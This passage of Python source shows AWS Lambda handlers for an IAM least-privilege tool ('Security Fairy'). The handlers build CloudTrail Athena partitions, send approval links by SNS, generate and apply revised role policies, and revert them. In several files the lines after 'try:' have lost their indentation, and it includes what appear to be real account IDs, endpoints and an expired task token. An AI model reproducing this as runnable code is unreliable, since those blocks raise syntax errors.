    #               "ownerIdentity": {
    #                 "principalId": "A3F4AZ9K861LVS"
    #               }
    #             },
    #             "s3SchemaVersion": "1.0"
    #           },
    #           "responseElements": {
    #             "x-amz-id-2": "qakr7pYcVWfsXM/BEncmZ/zQVPQnIAyN5ggRIF+9/+5JhAhhmMDZDJunlhhFowOKzGF9mNtF1Ys=",
    #             "x-amz-request-id": "5A68EDF6D1F0C933"
    #           },
    #           "awsRegion": "us-west-2",
    #           "eventName": "ObjectCreated:Put",
    #           "userIdentity": {
    #             "principalId": "AWS:AROAI6ZMWVXR3IZ6MKNSW:i-0c91c32104e81c79d"
    #           },
    #           "eventSource": "aws:s3"
    #         }
    #       ]
    #     }
    #     lambda_handler(EVENT, {})
--- FILE SEPARATOR ---
"""Email Approval Request
Sends an email to the user with an approval url.
"""
import boto3
import logging
from requests.utils import quote
from botocore.exceptions import ProfileNotFound
from setup_logger import create_logger
logger = create_logger(name="email_approval_request.py")
try:
SESSION = boto3.session.Session(profile_name='training',
region_name='us-east-1')
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
def lambda_handler(event, context):
    """Executed by the Lambda service.

    Builds the approval URL from the execution id, API endpoint and
    Step Functions task token carried in the event, then publishes it
    to the event's SNS topic.
    """
    execution_id = event['execution_id']
    # URL-encode the task token so it survives as a query-string value.
    task_token = quote(event['task_token'], safe='')
    api_endpoint = event['api_endpoint']
    approval_url = '{0}approve?execution-id={1}&task-token={2}'.format(
        api_endpoint, execution_id, task_token)
    message = 'Approve changes from Security Fairy here: {approval_url}'.format(
        approval_url=approval_url)
    logger.debug(message)
    publish_response = SESSION.client('sns').publish(
        TopicArn=event['sns_arn'],
        Message=message,
        Subject='Security Fairy Permissions Request')
    logger.debug(publish_response)
if __name__ == '__main__':
    # Local smoke test with a captured (long-expired) Step Functions task
    # token; publishing still requires valid AWS credentials.
    EVENT = {
        'execution_id':'f0774f6d-3986-4478-be43-23b62cfc65c0',
        'task_token': "AAAAKgAAAAIAAAAAAAAAAcMqTWc6Y9lUsccSZSoCCn8NOd71LbD98x2dU0LwJusNdxUOi7wwuwr4SmXXyCAfFIefCI/rnFfDeiOa4cN0uSF8a7uku4bN50BgFzcq7Aw1hY2V0rrE4KpSWJPVBUZ38LPwCXlvsFncAGOVRs9DDTj4docBIjwKjt2DBFEiaVQ6byk4zbsZlP0muYGNYR0gY9O6yh4Pf/zCfbRIvpZCiAdOV3kz2nkRH8YBCBCa1FvPPyPXWwlIsyL2ijdHC7G0//Xvv6ANmkYd9qCRwqSUYBm8nhTb0kFNWDBzsdEoEU9nFg2xWGvte7TaELVGGDVsk2y0YaDp4E6UwRiKNu0qIDeTA5OrpjVYurh/D3Pd06vc2aRpFQE9HxzCSJrg8lNS3jw3vLPXJzisourVu1SGZzHLOIEeqUDk4lWVGMylhm/EXefN2lmRC8p4NWIrtd9KrMJ3WlkrblS/aGzqCy3VRlmFITjHWws1+yvtBC0u3s99aYTvXXHylHCceE+EbL0qsES1qRrDtUdTHpJcB6MiaMf9Vbn2faa+OLJjnI8Y6J3uqFWl8yYFR41Cwc0RxH1RnsiQehwXLLiqvBSz4y+I5PI=",
        'api_endpoint': "https://gndl1fc1ii.execute-api.us-east-1.amazonaws.com/Prod",
        'sns_arn': 'arn:aws:sns:us-east-1:281782457076:security_fairy_topic'
    }
    lambda_handler(EVENT, {})
--- FILE SEPARATOR ---
"""Get Task Token
Retrieves the correct Task Token from the
Step Functions API, then updates the event
object for the next Lambda function.
"""
import boto3
import logging
from botocore.exceptions import ProfileNotFound
try:
SESSION = boto3.session.Session(profile_name='training')
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
def lambda_handler(event, context):
    """Executed by the Lambda service.

    Polls get_activity_task for the activity ARN in the event and returns
    the event enriched with the resulting 'task_token'.
    """
    stepfunctions = SESSION.client('stepfunctions')
    activity = stepfunctions.get_activity_task(activityArn=event['activity_arn'])
    event['task_token'] = activity['taskToken']
    logging.debug(event)
    return event
--- FILE SEPARATOR ---
"""Build_Cloudtrail_Table
Create the CloudTrail Logs table for Athena use.
See the AWS documentation for Athena here:
http://docs.aws.amazon.com/athena/latest/ug/getting-started.html
"""
import os
import sys
import json
import logging
import boto3
from datetime import datetime
from botocore.exceptions import ProfileNotFound
try:
SESSION = boto3.session.Session(
profile_name='sandbox',
region_name='us-east-1'
)
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
def lambda_handler(events, context):
    """Executed by the Lambda service.

    Registers today's CloudTrail partition, per region, on the Athena
    'cloudtrail' table so queries can prune by region/year/month/day.

    Environment:
        cloudtrail_bucket      -- bucket holding the CloudTrail logs
        security_fairy_bucket  -- bucket receiving Athena query output
        aws_account            -- account id used in the S3 key prefix
    """
    cloudtrail_bucket = os.environ['cloudtrail_bucket']
    security_fairy_bucket = os.environ['security_fairy_bucket']
    account = os.environ['aws_account']
    athena_client = SESSION.client('athena')
    output = f"s3://{security_fairy_bucket}/security-fairy-partition-queries"
    # Snapshot the clock once: the original took year/month/day from three
    # separate datetime.now() calls, which could straddle midnight and
    # produce an inconsistent date triple.
    now = datetime.now()
    year = now.year
    month = now.month
    day = now.day
    # CloudTrail zero-pads month and day in its S3 key layout (e.g.
    # AWSLogs/<acct>/CloudTrail/<region>/2017/08/23/), so the partition
    # LOCATION must be padded too — the unpadded path pointed at
    # non-existent prefixes for single-digit months/days.
    month_path = f"{month:02d}"
    day_path = f"{day:02d}"
    regions = ['us-west-2',
               'us-west-1',
               'us-east-2',
               'us-east-1',
               'ap-south-1',
               'ap-northeast-2',
               'ap-southeast-1',
               'ap-southeast-2',
               'ap-northeast-1',
               'ca-central-1',
               'cn-north-1',
               'eu-central-1',
               'eu-west-1',
               'eu-west-2',
               'eu-west-3',
               'sa-east-1',
               'us-gov-west-1'
               ]
    config = {
        'OutputLocation': output,
        'EncryptionConfiguration': {
            'EncryptionOption': 'SSE_S3'
        }
    }
    for region in regions:
        try:
            response = athena_client.start_query_execution(
                QueryString=(
                    f"ALTER TABLE cloudtrail ADD PARTITION "
                    f"(region='{region}', year={year}, month={month}, day={day}) "
                    f"LOCATION 's3://{cloudtrail_bucket}/AWSLogs/{account}/CloudTrail/"
                    f"{region}/{year}/{month_path}/{day_path}/'"
                ),
                ResultConfiguration=config
            )
            # TODO: route through a proper logger instead of print.
            print(response)
        except Exception as e:
            # Best-effort per region: e.g. an already-existing partition
            # raises; log and continue with the remaining regions.
            print(e)
--- FILE SEPARATOR ---
import boto3
import json
import logging
import os
import re
from aws_entity import AWSEntity
from setup_logger import create_logger
from aws_api_tools import api_response
from aws_api_tools import api_website
from aws_api_tools import get_domain_from_proxy_api_gateway
from botocore.exceptions import ProfileNotFound
from boto3.dynamodb.conditions import Key
# Module-level logger for the revert API handlers below.
logger = create_logger(name = "revert.py", logging_level=logging.INFO)
# Prefer the developer 'sandbox' profile locally; in Lambda the profile is
# absent, so fall back to the default credential chain.
try:
    SESSION = boto3.session.Session(profile_name='sandbox',
                                    region_name='us-east-1')
except ProfileNotFound as pnf:
    SESSION = boto3.session.Session()
def lambda_handler(event, context):
    """Route the incoming API Gateway request by HTTP verb.

    GET renders the revert website; POST reverts the posted entity ARN.
    Any other verb falls through to the default api_response().
    """
    http_method = event['httpMethod']
    if http_method == 'GET':
        logger.info('Request was an HTTP GET Request')
        return get_response(event)
    if http_method == 'POST':
        logger.info('Request was an HTTP POST Request')
        posted_arn = json.loads(event['body'])['entity_arn']
        logger.info('Body: {}'.format(posted_arn))
        return post_response(AWSEntity(posted_arn))
    return api_response()
def get_response(event):
    """Render the revert web page listing every Security-Fairy-audited entity.

    Returns an api_website() response whose HTML contains a table of audited
    roles plus a form that POSTs an entity ARN back to this endpoint.
    """
    entities = get_all_iam_audited_entities()
    # logger.info(type(entities))
    existing_entities = nosql_to_list_of_dicts(entities)
    # NOTE(review): iterating existing_entities[0] walks the KEYS of the
    # first item's dict — debug output only; confirm this was intended.
    for entity in existing_entities[0]:
        logging.debug(entity)
        logging.debug(type(entity))
    domain = get_domain_from_proxy_api_gateway(event)
    # Page template. $domain and $security_fairy_entities_list are
    # Template-style placeholders filled in via api_website()'s
    # safe_substitute_dict at the bottom of this function.
    body = """
            <html>
            <body bgcolor="#E6E6FA">
            <head>
            <!-- Latest compiled and minified CSS -->
            <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
            <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
            <style>
                .code {
                    max-height: 500px;
                    max-width: 900px;
                    overflow: scroll;
                    text-align: left;
                    margin-bottom: 20px;
                }
                th, td {
                    text-align: left;
                    padding: 15px;
                    height: 50px;
                    vertical-align: top;
                    border-bottom: 1px solid #ddd;
                }
                td {
                    font-size:x-small;
                }
            </style>
            <script>
                var dict = {};
                function submitRequest(revert){
                    dict["entity_arn"] = document.getElementById("entity_arn").value;
                    $.ajax({
                      type: 'POST',
                      headers: {
                          'Content-Type':'application/json',
                          'Access-Control-Allow-Origin': '*',
                          'Accept':'text/html'
                      },
                      url:'$domain' + 'revert',
                      crossDomain: true,
                      data: JSON.stringify(dict),
                      dataType: 'text',
                      success: function(responseData) {
                          document.getElementById("output").innerHTML = responseData;
                      },
                      error: function (responseData) {
                          alert('POST failed: '+ JSON.stringify(responseData));
                      }
                    });
                };
                function redirect(){
                    var name= document.getElementById("entity_arn").value.split("/")[1];
                    var url = "https://console.aws.amazon.com/iam/home?region=us-east-1#/roles/"+name;
                    document.location.href = url;
                };
                $(document).ready(function(){
                    //document.getElementById("output").innerHTML = JSON.stringify({}, null, "\t");
                    $("#revert").click(function(){
                        console.log("Approve button clicked");
                        submitRequest("revert");
                        setTimeout(redirect,4000);
                    });
                    $("#cancel").click(function(){
                        console.log("Cancel button clicked");
                        setTimeout(redirect,500);
                    });
                });
            </script>
            </head>
            <body>
            <center>
            <title>IAM Security Fairy</title>
            <h1><span class="glyphicon glyphicon-fire text-danger" ></span> IAM Security Fairy</h1>
            <div class="code"><pre>
            <table class="code">
              <tr>
                <th>Execution Id</th>
                <th>Role ARN</th>
                <th>Original Managed Policies</th>
              </tr>
              $security_fairy_entities_list
            </table>
            </pre></div>
            <div class="code"><pre id='output' style="visibility:hidden;"></pre></div>
            <div class="code">Enter the arn of the role you would like to revert:<br>
            <form style= "display: inline-block;" action="" method="post">
                <textarea rows="1" cols="40" name="text" id="entity_arn" placeholder="arn:aws:iam::0123456789:role/roleName"></textarea>
            </form>
            <button style= "display: inline-block;margin-bottom: 20px;" class="btn btn-primary" id='revert'>Revert</button>
            <button style= "display: inline-block;margin-bottom: 20px;" class="btn btn-danger" id='cancel'>Cancel</button>
            </div>
            </center>
            </body>
            </html>"""
    logger.info(existing_entities[0])
    security_fairy_entities_list = ''
    # One <tr> per audited entity; each archived managed-policy ARN is shown
    # by its policy path/name (the 6th ':'-separated ARN field).
    for entity in existing_entities:
        table_row = """<tr>
                        <td>{execution_id}</td>
                        <td>{entity_arn}</td>
                        <td>""".format(execution_id=entity['execution_id'],
                                       entity_arn=entity['entity_arn'])
        for policy in entity['existing_policies']:
            table_row+= "{policy}<br>".format(policy=policy.split(':')[5])
        table_row+="</td></tr>"
        security_fairy_entities_list += table_row
    safe_substitute_dict = dict(domain = domain, security_fairy_entities_list=security_fairy_entities_list)
    return api_website(website_body=body, safe_substitute_dict=safe_substitute_dict)
def get_all_iam_audited_entities():
    """Scan the Security Fairy DynamoDB table for every audited entity.

    Returns the raw DynamoDB 'Items' list (typed attribute maps).
    """
    items = SESSION.client('dynamodb').scan(
        TableName='security_fairy_dynamodb_table',
        AttributesToGet=[
            'execution_id',
            'entity_arn',
            'existing_policies'
        ])['Items']
    logger.info(items)
    logger.info(type(items))
    return items
def post_response(aws_entity):
    """Revert the given entity's role and report the outcome.

    Returns a 200 HTML api_response on success. On any failure the full
    traceback is logged and a generic error body is returned so the API
    never leaks internals.
    """
    try:
        revert_role_managed_policies(aws_entity)
    except Exception:
        # Generic catch-all: the revert touches IAM and DynamoDB and any of
        # it can fail. logger.exception records the traceback (the original
        # logger.error(e) lost it).
        logger.exception('Role revert failed')
        return api_response(body='Error - Role wasn\'t reverted properly.')
    # "it's" -> "its": fixed typo in the user-facing success message.
    return api_response(statusCode=200,
                        headers={"Access-Control-Allow-Origin": "*", "Content-Type": "text/html"},
                        body='Success: The IAM Role has had its pre-security fairy permissions established')
def revert_role_managed_policies(aws_entity):
    """Restore a role's pre-Security-Fairy managed policies.

    Re-attaches the archived policies first, then removes the Security
    Fairy revised policy. Raises ValueError for non-role ARNs.
    """
    if not aws_entity.is_role():
        raise ValueError("The submitted ARN must be for a role.")
    associate_preexisting_policies(aws_entity)
    disassociate_security_fairy_policy(aws_entity)
    # delete_security_fairy_dynamodb_entry(aws_entity)
def get_preexisting_policies(entity_arn):
    """Fetch the archived 'existing_policies' string-set for an entity ARN.

    Scans the Security Fairy DynamoDB table for the entity's record and
    returns the list of policy ARNs that were attached before the audit.
    """
    scan_filter = {
        'entity_arn': {
            'AttributeValueList': [{'S': entity_arn}],
            'ComparisonOperator': 'EQ'
        }
    }
    matching_item = SESSION.client('dynamodb').scan(
        TableName='security_fairy_dynamodb_table',
        ScanFilter=scan_filter)['Items'][0]
    logger.info(matching_item)
    preexisting = matching_item['existing_policies']['SS']
    logger.info(preexisting)
    return preexisting
def associate_preexisting_policies(aws_entity):
    """Re-attach every archived managed policy to the entity's role."""
    iam_client = SESSION.client('iam')
    role_name = aws_entity.get_entity_name()
    archived_policies = get_preexisting_policies(aws_entity.get_full_arn())
    for policy_arn in archived_policies:
        logger.info(policy_arn)
        iam_client.attach_role_policy(RoleName=role_name,
                                      PolicyArn=policy_arn)
def disassociate_security_fairy_policy(aws_entity):
    """Detach and delete the Security Fairy revised policy from a role.

    The policy ARN is reconstructed from the account number and entity name
    using the same '-security-fairy-revised-policy' naming convention used
    when the policy was created. Missing-entity errors are logged and
    swallowed (nothing to clean up).
    """
    iam_client = SESSION.client('iam')
    account_number = aws_entity.get_account_number()
    entity_name = aws_entity.get_entity_name()
    policy_arn = 'arn:aws:iam::{account_number}:policy/security-fairy/{entity_name}-security-fairy-revised-policy'\
                 .format(account_number=account_number,
                         entity_name=entity_name)\
                 .replace('_','-')
    logger.info(policy_arn)
    try:
        detach_policy(entity_name, policy_arn)
        delete_policy(policy_arn)
    except iam_client.exceptions.NoSuchEntityException as error:
        # Fixed: was logging.info on the root logger, bypassing this
        # module's configured logger.
        logger.info("Error deleting or detaching policy from role: {}, the entity doesn't exist.".format(error))
def detach_policy(entity_name, policy_arn):
    """Detach one managed policy from the named role."""
    iam_client = SESSION.client('iam')
    iam_client.detach_role_policy(RoleName=entity_name, PolicyArn=policy_arn)
    # Fixed: use the module logger (was root 'logging') and log policy and
    # role in the right order — we detach the policy FROM the role; the
    # original message read "Detaching <role> from <policy>".
    logger.info("Detaching {} from {}".format(policy_arn, entity_name))
def delete_policy(policy_arn):
    """Delete a managed policy, removing its non-default versions first.

    IAM refuses to delete a policy while non-default versions remain, so
    those are deleted before the policy itself.
    """
    iam_client = SESSION.client('iam')
    for version in iam_client.list_policy_versions(PolicyArn=policy_arn)['Versions']:
        if not version['IsDefaultVersion']:
            iam_client.delete_policy_version(PolicyArn=policy_arn,
                                             VersionId=version['VersionId'])
    iam_client.delete_policy(PolicyArn=policy_arn)
def nosql_to_list_of_dicts(dynamodb_response_item):
    """Flatten DynamoDB-typed items into plain dicts.

    Each attribute arrives as {name: {type_tag: value}} (e.g.
    {'S': 'text'} or {'SS': [...]}); the type tag is stripped so callers
    see {name: value}.
    """
    return [
        {attribute: wrapped[type_tag]
         for attribute, wrapped in typed_item.items()
         for type_tag in wrapped}
        for typed_item in dynamodb_response_item
    ]
if __name__ == '__main__':
    # Local smoke test: renders the revert page for a canned API Gateway
    # GET event (requires AWS credentials for the DynamoDB scan).
    # entity_arn = 'arn:aws:iam::281782457076:role/1s_tear_down_role'
    # disassociate_security_fairy_policy(entity_arn)
    # delete_policy('arn:aws:iam::281782457076:policy/security-fairy/1s-tear-down-role-security-fairy-revised-policy')
    # associate_preexisting_policies("arn:aws:iam::281782457076:role/1s_tear_down_role")
    # get_all_iam_audited_entities()
    # print(nosql_to_list_of_dicts(get_all_iam_audited_entities()))
    # NOTE(review): 'headers' appears twice in the literal below; the later
    # dict value silently overwrites the earlier None — confirm intent.
    event = {
        "resource":"/revert",
        "path":"/revert",
        "httpMethod":"GET",
        "headers":None,
        "queryStringParameters":None,
        "pathParameters":None,
        "stageVariables":None,
        "cognitoAuthenticationType":None,
        u'headers': {
            u'origin': u'https://twzwjoriak.execute-api.us-east-1.amazonaws.com',
            u'Accept': u'text/html',
            u'Host': u'twzwjoriak.execute-api.us-east-1.amazonaws.com'
        },
        u'requestContext': {
            u'resourceId': u'ktk3jq',
            u'apiId': u'ezwzmmh526',
            u'resourcePath': u'/{approval}',
            u'httpMethod': u'GET',
            u'requestId': u'2938ad50-50a7-11e7-bff1-93579d44e732',
            u'path': u'/Prod/approve',
            u'accountId': u'281782457076',
            u'stage': u'Prod'
        }
    }
    # lambda_handler(event, {})
    # dynamodb_response_item = [{u'entity_arn': {u'S': u'arn:aws:iam::281782457076:role/1s_tear_down_role'}, u'existing_policies': {u'SS': [u'arn:aws:iam::281782457076:policy/1S-NetworkAdmin-Policy', u'arn:aws:iam::281782457076:policy/AccessNavigationNotebookObjects', u'arn:aws:iam::281782457076:policy/AllowAuroraToGdeltBucket', u'arn:aws:iam::281782457076:policy/AllowUserChangePassword', u'arn:aws:iam::aws:policy/AdministratorAccess']}, u'execution_id': {u'S': u'4c0201ab-76e3-4c42-80ed-fdd99f5968cf'}}]
    # print(type(dynamodb_response_item))
    logger.info(get_response(event)['body'].strip('\n'))
--- FILE SEPARATOR ---
"""Revised Policy Approve
Implements the changes suggested by Security
Fairy. Detaches the existing policy for the
queried role and attaches the revised policy.
"""
import boto3
import os
import logging
import re
from setup_logger import create_logger
from aws_entity import AWSEntity
from botocore.exceptions import ProfileNotFound
try:
SESSION = boto3.session.Session(profile_name='training', region_name='us-east-1')
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
logger = create_logger(name='revised_policy_approve.py', logging_level=logging.INFO)
def lambda_handler(event, context):
    """Swap a role's managed policies for Security Fairy's revised policy.

    Looks up the revised policy by execution id, archives the role's
    current managed policies to DynamoDB, attaches the revised policy,
    then detaches the originals. Failures are logged and swallowed.
    """
    try:
        execution_id = event['execution_id']
        logger.debug(execution_id)
        # An explicit event value wins over the Lambda environment default.
        dynamodb_table = event.get('dynamodb_table', os.environ['dynamodb_table'])
        logger.debug(dynamodb_table)
        revised_policy = get_revised_policy(execution_id, dynamodb_table)
        logger.debug(revised_policy)
        role_name = AWSEntity(revised_policy['entity_arn']).get_entity_name()
        logger.debug(role_name)
        current_policies = get_existing_managed_policies(role_name)
        # Archive before mutating so the change can be reverted later.
        preserve_existing_policies(execution_id, current_policies, dynamodb_table)
        apply_revised_policy(revised_policy)
        detach_existing_policies(role_name, current_policies)
    except Exception as error:
        logger.info("There was an error: ")
        logger.info(error)
def apply_revised_policy(policy_object):
    """Attach Security Fairy's suggested policy"""
    iam_client = SESSION.client('iam')
    target = AWSEntity(policy_object['entity_arn'])
    policy_document = policy_object['policy']
    role_name = target.get_entity_name()
    account_number = target.get_account_number()
    # IAM policy names may not contain '_'.
    policy_name = "{entity_name}-security-fairy-revised-policy"\
                  .format(entity_name=role_name)\
                  .replace("_","-")
    logger.info("Attaching: ")
    logger.info(policy_name)
    try:
        new_policy_arn = create_new_policy(policy_name, policy_document)
    except Exception as e:
        # Creation failed (typically: the policy already exists), so publish
        # the document as a new default version of the existing policy.
        logger.info(e)
        new_policy_arn = create_new_policy_version(policy_name, policy_document, account_number)
    logger.debug(new_policy_arn)
    attachment_response = iam_client.attach_role_policy(RoleName=role_name,
                                                        PolicyArn=new_policy_arn)
    logger.debug(attachment_response)
def create_new_policy(policy_name, policy):
    """Create a managed policy under /security-fairy/ and return its ARN."""
    creation_response = SESSION.client('iam').create_policy(
        PolicyName=policy_name,
        Path='/security-fairy/',
        PolicyDocument=policy,
        Description='This is an autogenerated policy from Security Fairy')
    logger.debug(creation_response)
    return creation_response['Policy']['Arn']
def create_new_policy_version(policy_name, policy, account_number):
    """Publish *policy* as a new default version of an existing managed policy.

    Reconstructs the policy ARN from the account number and name, prunes one
    old version if needed (IAM caps managed policies at 5 versions), then
    creates the new version as the default. Returns the policy ARN.
    """
    policy_arn = "arn:aws:iam::{account_number}:policy/security-fairy/{policy_name}" \
                 .format(account_number=account_number, policy_name=policy_name)
    iam_client = SESSION.client('iam')
    versions = iam_client.list_policy_versions( PolicyArn=policy_arn)['Versions']
    logger.debug(versions)
    if len(versions) > 1:
        # NOTE(review): assumes versions[1] is the one safe to delete (i.e.
        # list order puts the default/newest first) — confirm against the
        # ListPolicyVersions ordering; deleting the default version fails.
        version_id = versions[1]['VersionId']
        logger.debug(version_id)
        iam_client.delete_policy_version(   PolicyArn=policy_arn,
                                            VersionId=version_id)
    # apply new version
    response = iam_client.create_policy_version(PolicyArn=policy_arn,
                                                PolicyDocument=policy,
                                                SetAsDefault=True)
    logger.info("Policy version {} created.".format(response['PolicyVersion']['VersionId']))
    return policy_arn
def get_existing_managed_policies(entity_name):
    """Return the ARNs of every managed policy attached to the role."""
    attached = SESSION.client('iam')\
                      .list_attached_role_policies(RoleName=entity_name)['AttachedPolicies']
    policy_arns = []
    for attached_policy in attached:
        logger.debug(attached_policy['PolicyArn'])
        policy_arns.append(attached_policy['PolicyArn'])
    logger.debug(policy_arns)
    return policy_arns
def preserve_existing_policies(execution_id, existing_policies, dynamodb_table):
    """Archive the role's current managed-policy ARNs under its execution id.

    No-op (with a log line) when the role had no managed policies, since a
    DynamoDB string-set may not be empty.
    """
    logger.debug(execution_id)
    logger.debug(existing_policies)
    logger.debug(dynamodb_table)
    if not existing_policies:
        logger.info("There were no existing policies attached to this role.")
        return
    SESSION.client('dynamodb').update_item(
        TableName=dynamodb_table,
        Key={"execution_id": {"S": execution_id}},
        AttributeUpdates={
            "existing_policies": {
                "Value": {"SS": existing_policies}
            }})
def detach_existing_policies(entity_name, existing_policies):
    """Take existing managed IAM policies and remove them from the role"""
    logger.info("Detaching Policies: ")
    logger.info(existing_policies)
    iam_client = SESSION.client('iam')
    for policy_arn in existing_policies:
        logger.debug(policy_arn)
        iam_client.detach_role_policy(RoleName=entity_name,
                                      PolicyArn=policy_arn)
def get_revised_policy(execution_id, dynamodb_table):
    """Retrieve Security Fairy's suggested policy"""
    try:
        item = SESSION.client('dynamodb').get_item(
            TableName=dynamodb_table,
            Key={
                "execution_id": {
                    "S": execution_id
                }
            })['Item']
        revised = {}
        revised['policy'] = item['new_policy']['S']
        revised['entity_arn'] = item['entity_arn']['S']
        logger.debug(revised)
        return revised
    except Exception as e:
        # Missing item / missing attributes both land here: the execution id
        # is unknown or its record has been cleaned up.
        logger.info(e)
        raise ValueError('Execution Id doesn\'t exist or has expired. \
                         Security-fairy must be rerun.')
if __name__ == '__main__':
    # Local smoke test: applies the revised policy for a known execution id
    # (requires AWS credentials; mutates IAM and DynamoDB).
    # existing_policies = ['arn:aws:iam::aws:policy/AmazonS3FullAccess', 'arn:aws:iam::281782457076:policy/security-fairy/1s-security-fairy-role-security-fairy-revised-policy', 'arn:aws:iam::aws:policy/AmazonDynamoDBFullAccess', 'arn:aws:iam::aws:policy/AdministratorAccess']
    # dynamodb_table = 'security_fairy_dynamodb_table'
    # execution_id = '830eb4f7-364f-44b2-8617-578276ce2270'
    # preserve_existing_policies(execution_id, existing_policies, dynamodb_table)
    lambda_handler({
        "execution_id": "869f474a-d594-42be-869c-3362c063f940",
        "dynamodb_table": "security_fairy_dynamodb_table"
        }
        , {})
    # existing_policies = ['arn:aws:iam::aws:policy/AmazonS3FullAccess', 'arn:aws:iam::aws:policy/AmazonDynamoDBFullAccess', 'arn:aws:iam::aws:policy/AdministratorAccess']
    # dynamodb_table = 'security_fairy_dynamodb_table'
    # execution_id = '4bb5d1ad-17ed-43d7-a06b-59ead4a9cf00'
    # preserve_existing_policies(execution_id, existing_policies, dynamodb_table)
    # print(get_existing_managed_policies('1s_security_fairy_role'))
--- FILE SEPARATOR ---
"""Revised Policy Deny
Discards the changes suggested by
Security Fairy.
"""
import boto3
import json
import logging
import os
from botocore.exceptions import ProfileNotFound
try:
SESSION = boto3.session.Session(profile_name='training')
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
def lambda_handler(event, context):
    """Executed by the Lambda service.

    Deletes Security Fairy's suggested policy from the DynamoDB table.
    The original payload arrives wrapped in the Step Functions error
    'Cause' field as a JSON string.
    """
    logging.debug(event)
    inner_event = json.loads(event['Cause'])
    logging.debug(inner_event)
    delete_revised_policy(os.environ['dynamodb_table'],
                          inner_event['execution_id'])
def delete_revised_policy(dynamodb_table, execution_id):
    """Delete Security Fairy's suggested policy"""
    dynamodb_client = SESSION.client('dynamodb')
    dynamodb_client.delete_item(
        TableName=dynamodb_table,
        Key={
            "execution_id": {
                "S": execution_id
            }
        })
if __name__ == '__main__':
    # NOTE(review): an empty event raises KeyError('Cause') inside
    # lambda_handler — this entry point only exercises the failure path.
    lambda_handler({}, {})
--- FILE SEPARATOR ---
"""Revised Policy Generator
Builds a revised policy for the queried
role using data retrieved from Athena.
"""
from __future__ import print_function
import json
import re
import boto3
import logging
from botocore.exceptions import ClientError
from botocore.exceptions import ProfileNotFound
from setup_logger import create_logger
from aws_entity import AWSEntity
from aws_iam_policy import IAMPolicy
logger = create_logger(name="revised_policy_generator.py")
try:
SESSION = boto3.session.Session(profile_name='training', region_name='us-east-1')
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
__author__ = 'Justin Iravani'
class NoResults(Exception):
    """Raised when the Athena query produced an empty result set."""
    pass
class QueryFailed(Exception):
    """Raised when the Athena query ended in FAILED or CANCELLED state."""
    pass
class QueryStillRunning(Exception):
    """Raised when the Athena query is still QUEUED or RUNNING."""
    pass
def lambda_handler(event, context):
    """Executed by the Lambda service.

    Builds a revised policy from the Security Fairy Athena query results
    and stores it in DynamoDB. Returns the event annotated with
    'query_state' ('StillRunning' triggers another poll by the state
    machine).
    """
    query_execution_id = event.get('execution_id')
    if query_execution_id is None:
        raise ValueError("Lambda Function requires 'query_execution_id' to execute.")
    try:
        raw_query_results = get_query_results(query_execution_id)
        aws_entity = get_entity_arn(raw_query_results)
        event['query_state'] = 'QueryCompletedOrFailed'
    except QueryStillRunning:
        # Tell the state machine to poll again later.
        event['query_state'] = 'StillRunning'
        return event
    actions = get_permissions_from_query_v2(raw_query_results)
    revised_policy = IAMPolicy()
    revised_policy.add_actions(actions)
    logger.info(aws_entity.get_entity_name())
    # NOTE(review): the return value was never used in the original either,
    # but the call logs/prints the role's customer-managed policies as a
    # side effect — kept for parity.
    get_existing_entity_policies_v2(aws_entity.get_entity_name())
    write_policies_to_dynamodb(query_execution_id,
                               revised_policy.print_policy(),
                               aws_entity.get_full_arn(),
                               event.get('dynamodb_table','security_fairy_dynamodb_table'))
    event['execution_id'] = query_execution_id
    return event
def get_query_results(query_execution_id):
    """Retrieve result set from Athena query"""
    athena_client = SESSION.client('athena')
    query = athena_client.get_query_execution(QueryExecutionId=query_execution_id)
    logger.debug(query)
    state = query['QueryExecution']['Status']['State']
    logger.debug(state)
    if state in ('FAILED', 'CANCELLED'):
        raise QueryFailed("Query failed to execute")
    if state in ('QUEUED', 'RUNNING'):
        raise QueryStillRunning("Query still running")
    result_set = []
    try:
        results = athena_client.get_query_results(QueryExecutionId=query_execution_id)
        logger.debug(results)
        # The first row is the column header; keep only data rows.
        result_set = [row["Data"] for row in results["ResultSet"]["Rows"][1:]]
        logger.debug(result_set)
    except ClientError as cle:
        logger.debug(cle)
    if not result_set:
        raise NoResults("Athena ResultSet {result_set}".format(result_set=result_set))
    return result_set
def get_permissions_from_query_v2(result_set):
    """
    Retrieve permissions from Athena query results
    v2
    """
    permissions = []
    for row in result_set:
        # Column 1: event source, e.g. 's3.amazonaws.com' -> 's3'.
        service = row[1]['VarCharValue'].split('.')[0]
        # Column 2: '[ActionA, ActionB]'-style list of API actions.
        raw_actions = row[2]['VarCharValue'].strip('[').strip(']').split(', ')
        permissions.extend(
            '{service}:{action}'.format(service=service, action=action)
            for action in raw_actions)
    logger.debug('service actions from Athena Query')
    logger.debug(permissions)
    return permissions
def get_existing_entity_policies_v2(role_name):
    """
    Retrieve existing managed policies for the queried role
    """
    iam_client = SESSION.client('iam')
    logger.debug("role_name: {}".format(role_name))
    # NOTE(review): 'policies' is never populated, and the loop below only
    # PRINTS customer-managed policies while ALL attached policies are
    # returned — looks like an unfinished filter; confirm intended behavior.
    policies = []
    attached_policies = iam_client.list_attached_role_policies(RoleName=role_name)
    existing_policies = attached_policies['AttachedPolicies']
    for existing_policy in existing_policies:
        # AWS-managed policy ARNs live under 'arn:aws:iam::aws:policy'.
        if 'arn:aws:iam::aws:policy' not in existing_policy['PolicyArn']:
            print(existing_policy)
    return existing_policies
def write_policies_to_dynamodb(execution_id, policy, entity_arn, dynamodb_table):
    """Write policies to DynamoDB table"""
    dynamodb_client = SESSION.client('dynamodb')
    previous_items = existing_dynamodb_entry(entity_arn, dynamodb_table)
    if previous_items:
        # Re-key the entity's existing item under the new execution id so
        # other attributes (e.g. archived policies) are preserved.
        item = previous_items[0]
        delete_execution(item['execution_id']['S'], dynamodb_table)
        item['new_policy'] = { "S": policy }
        item['execution_id'] = { "S": execution_id }
    else:
